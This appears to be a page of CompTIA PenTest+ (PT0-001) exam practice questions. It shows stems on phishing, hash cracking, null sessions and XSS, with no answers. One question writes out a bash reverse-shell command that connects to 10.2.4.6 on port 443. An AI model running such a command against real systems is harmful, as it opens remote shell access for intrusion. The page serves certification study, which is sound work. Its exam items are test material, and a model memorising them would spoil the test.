Exam Logo

Comptia (PT0-001) Exam Questions And Answers page 13

A senior employee received a suspicious email from another executive requesting an urgent wire transfer. Which of the following types of attacks is likely occurring?
Attacks and Exploits
A software developer wants to test the code of an application for vulnerabilities. Which of the following processes should the software developer perform?
Information Gathering and Vulnerability Identification
A software development team recently migrated to new application software on the on-premises environment. Penetration test findings show that multiple vulnerabilities exist. If a penetration tester does not have access to a live or test environment, a test might be better to create the same environment on the VM. Which of the following is MOST important for confirmation?
Information Gathering and Vulnerability Identification Penetration Testing Tools
A static code analysis report of a web application can be leveraged to identify:
Planning and Scoping Information Gathering and Vulnerability Identification
A systems security engineer is preparing to conduct a security assessment of some new applications. The applications were provided to the engineer as a set that contains only JAR files. Which of the following would be the MOST detailed method to gather information on the inner workings of these applications?
Information Gathering and Vulnerability Identification
A tester has captured a NetNTLMv2 hash using Responder. Which of the following commands will allow the tester to crack the hash using a mask attack?
Attacks and Exploits Penetration Testing Tools
A tester has determined that null sessions are enabled on a domain controller. Which of the following attacks can be performed to leverage this vulnerability?
Information Gathering and Vulnerability Identification Attacks and Exploits
A tester identifies an XSS attack vector during a penetration test. Which of the following flags should the tester recommend to prevent a JavaScript payload from accessing the cookie?
Attacks and Exploits Penetration Testing Tools
A tester intends to run the following command on a target system:

bash -i >& /dev/tcp/10.2.4.6/443 0> &1

Which of the following additional commands would need to be executed on the tester s Linux system to make the previous command successful?
Attacks and Exploits Penetration Testing Tools
A tester was able to retrieve domain users hashes. Which of the following tools can be used to uncover the users passwords? (Choose two.)
Attacks and Exploits Penetration Testing Tools